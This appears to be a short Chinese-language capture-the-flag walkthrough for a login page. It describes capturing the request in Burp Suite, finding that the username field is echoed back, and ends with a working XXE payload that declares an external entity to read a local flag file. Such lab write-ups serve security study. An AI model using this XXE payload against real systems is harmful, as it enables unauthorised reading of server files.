进入环境

出现一个登录页面，输入任意 UserName 和 Psaaword ，使用bp抓取登录数据包

发送到重放器，点击“发送”

只修改 username 的值，查看右边的变化

只修改 password 的值，查看右边的变化

修改 username 和 password 的值，查看右边的变化

发现 username 位置为回显位，我们可以构造xxe攻击，具体操作如下

<?xml version="1.0"?>
<!DOCTYPE user [ 
<!ENTITY xxe SYSTEM "file:///c:/flag/flag" > ]><user><username>&xxe;</username><password>1</password>
</user>